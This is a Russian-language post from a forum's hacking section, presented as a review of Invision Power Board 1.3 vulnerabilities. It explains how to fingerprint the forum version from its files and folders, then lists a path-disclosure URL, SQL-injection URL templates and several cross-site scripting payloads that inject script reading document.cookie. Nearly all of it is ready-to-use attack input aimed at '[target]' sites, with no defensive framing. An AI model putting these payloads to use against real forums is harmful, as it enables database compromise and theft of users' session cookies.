-=Всё будет=- |
Привет, Гость! Войдите или зарегистрируйтесь.
Вы здесь » -=Всё будет=- » Хакинг » Обзор уязвимостей форумов [Invision Power Board]
Весь материал в этой статье был собран на просторах интернета
Invision Power Board 1.3 :
Раскритие пути :
http://[target]/forum/index.php?act=UserCP&CODE=photo
Для определения версии этого форума определяется наличием файлов и папок:
файлы: папки:
css.php /Skin/
conf_mime_types.php /ssi_templates/
ssi.php /html/emoticons/
show.php /fonts/
После того как убедились что версия форума Invision Power Board 1.3,
можно воспользоваться уязвимостями и сплоитами:
SQL-INJECTION:
http://[target]index.php?act=Search&nav=lv&CODE=show&
searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL]/*\
http://[target]/ssi.php?a=out&type=xml&f=0)[SQL]
http://[target]/forums/index.php?act=Members
&max_results=30&filter=1&sort_order=asc&
sort_key=name&st=[SQL]
XSS:
http://[target]/?c='><script>alert(window.document.url)</script><plain text>
http://[target]/?showtopic='><script>alert(window.document.url)</script><plaintext>
http://[target]/?act=SR&f='><script>alert(document.cookie)</script>
http://[target]/?showuser='><script>alert(document.cookie)</script>
http://[target]/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>
http://[target]/index.php?s=&act=chat&pop=1;'><script>alert('xss')</script><plaintext>
Вы здесь » -=Всё будет=- » Хакинг » Обзор уязвимостей форумов [Invision Power Board]
